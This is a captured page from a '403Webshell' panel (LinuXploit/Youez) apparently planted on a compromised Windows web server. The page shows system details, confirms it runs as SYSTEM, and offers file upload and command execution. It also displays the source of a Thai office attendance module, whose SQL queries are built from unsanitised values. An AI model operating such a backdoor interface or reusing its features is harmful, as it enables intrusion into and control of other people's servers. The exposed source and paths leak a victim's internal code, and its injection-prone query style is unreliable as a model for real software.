403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myoffice/2566/modules_22222/calendarswork/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myoffice/2566/modules_22222/calendarswork/index.php
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<style type="text/css">
<!--
.calendarswork { 
    width:1000;
    background-color: #d7fef6;
}
-->
</style>
<div align='left'>&nbsp;&nbsp;<IMG SRC="images/icon/calendar.gif" BORDER="0" ALIGN="absmiddle">&nbsp;&nbsp;<b>WORK AT HOME</b>
&nbsp;&nbsp;<A HREF="?name=calendarswork&file=add2" ><font color=blue><b><u>บันทึกรายการผู้ไม่ปฏิบัติงาน</u><b></font></A>
<BR>
<div align='center'><b>บัญชีลงเวลา </b>
						<?
						if(!$_GET['month']){
							$_GET['month'] = date("m");
						}
						if(!$_GET['year']){
							$_GET['year'] = date("Y");
						}
						$cal = new MyCalendarswork;
						echo $cal->getmonthView($_GET['month'],$_GET['year'] );
						?>
	</div>	
	  <table cellspacing="0" cellpadding="0" width="100%" border="0">
        <tbody>
          <tr>
            <td valign="top"  ><div align="center"><font color=red><B>การมาปฏิบัติราชการ
			<?
     $thaiweek=array("วันอาทิตย์","วันจันทร์","วันอังคาร","วันพุธ","วันพฤหัส","วันศุกร์","วันเสาร์");

     $thaimonth=array("มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","      มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");

     echo $thaiweek[date("w")] ,"ที่",date(" j "), $thaimonth[date(" m ")-1] , " พ.ศ. ",date(" Y ")+543;
     // ผลลัพธ์จะได้ดังนี้ครับ วันเสาร์ที่ 26 กันยายน พ.ศ. 2552
?>
ของบุคลากรสำนักงาน</B></font>
			</td>
			</tr>
		   <tr>
            <td valign="top" width="100%" >                 
                                      <!-- แสดงผลรายการสมาชิกเว็บ -->

                                      <?
//////////////////////////////////////////// แสดงรายชื่อสมาชิกเว็บ
if($_GET[op] == ""){
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 1000 ;
$SUMPAGE = $db->num_rows(TB_user,"id","level>1 and status='1'");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
?>
<form action="?name=user&amp;file=user_cp&amp;op=user_del&amp;action=multidel" method="post" name="myform" id="myform">
<TABLE width="100%" >
  <TR > 
    <TD rowspan="2" align="center" valign="middle"bgcolor="#99ccff">ที่</TD>
    <TD rowspan="2" align="center" valign="middle"bgcolor="#99ccff">ชื่อ-สกุล</TD>
    <TD rowspan="2" align="center" valign="middle"bgcolor="#99ccff">สถานะ</TD>
    <TD colspan="3" align="center" valign="middle"bgcolor="#99ccff">วัน เดือน ปี</TD>
  </TR>
  <TR bgcolor="#99ccff"> 
    <TD align="center" valign="middle">เริ่มต้น</TD>
    <TD align="center" valign="middle">สิ้นสุด</TD>
    <TD align="center" valign="middle">แก้ไข/ลบ</TD>

  </TR>
<?
//ดึงค่า
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[calendars] = $db->select_query("SELECT * FROM ".TB_CALENDARSWORK." WHERE   date(date_event)=curdate()   ORDER BY p_work ,timeout ASC  ");
$count=0;
$i=1;
while($arr[calendars] = $db->fetch($res[calendars])){

	$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$arr[calendars][person]."'  ");
	$arr[user] = $db->fetch($res[user]);

	$res[approval] = $db->select_query("SELECT * FROM ".TB_APPROVAL." WHERE cat='".$arr[calendars][person]."' and comment='อนุมัติ' ");
	$arr[approval] = $db->fetch($res[approval]);

	$res[tkk6] = $db->select_query("SELECT * FROM ".TB_TKK6." WHERE cat='".$arr[calendars][person]."' and comment1='อนุญาต' ");
	$arr[tkk6] = $db->fetch($res[tkk6]);
?>
  <TR valign="top" bgcolor="#FFFFFF"> 
											<td width="20" align="center"><? echo"".$i?></td>
											<td width="250" ><font color=red> <font color=blue>&nbsp;&nbsp;<?echo $arr[user][category_name];?></font></td>
											<td width="250" >
										<font color=blue>&nbsp;&nbsp;<?echo $arr[calendars][p_work];?></font>
											</td>	
											<td width="120" align="center"><font color=blue><?echo $arr[calendars][timeout];?>
											<?
													if(($arr[approval][cat])AND($arr[calendars][timeout]=='')){ 	  
											?>
											<?echo @("".thai_date_short(strtotime($arr[approval][date]))."" );?></font>
											<? } else {echo ""; }?>
											<?
													if(($arr[tkk6][cat])AND($arr[calendars][timeout]=='')){ 	  
											?>
											<?echo @("".thai_date_short(strtotime($arr[approval][date1]))."" );?></font>
											<? } else {echo ""; }?>

											</td>
											<td width="120" align="center"><font color=blue><?echo $arr[calendars][timeout2];?></font>
											<?
													if(($arr[approval][cat])AND($arr[calendars][timeout]=='')){ 	  
											?>
											<?echo @("".thai_date_short(strtotime($arr[approval][date1]))."" );?></font>
											<? } else {echo ""; }?>
											<?
													if(($arr[tkk6][cat])AND($arr[calendars][timeout]=='')){ 	  
											?>
											<?echo @("".thai_date_short(strtotime($arr[approval][date2]))."" );?></font>
											<? } else {echo ""; }?>
											</td>
											<td width="60" align="center"valign="top">
											<a href="?name=calendarswork&file=edit&id=<? echo $arr[calendars][id];?>"><img src="images/icon/edit.gif" border="0" alt="แก้ไข" /></a>
											<a href="?name=calendarswork&file=delevent&id=<? echo $arr[calendars][id];?>"><img src="images/admin/trash.gif"  border="0" alt="ลบ" ></a>
										</td>

<?
$i++;
 } 
?>
  </TR>
  </TABLE>
<div align="left">
  <?
	SplitPage($page,$totalpage,"?name=user&file=userapproval");
	echo $ShowSumPages ;
	echo $ShowPages ;
	echo "<BR><BR>";	
}
?>
</div>
					  </td>
                    </tr>
                  </tbody>
                </table>

Youez - 2016 - github.com/yon3zu
LinuXploit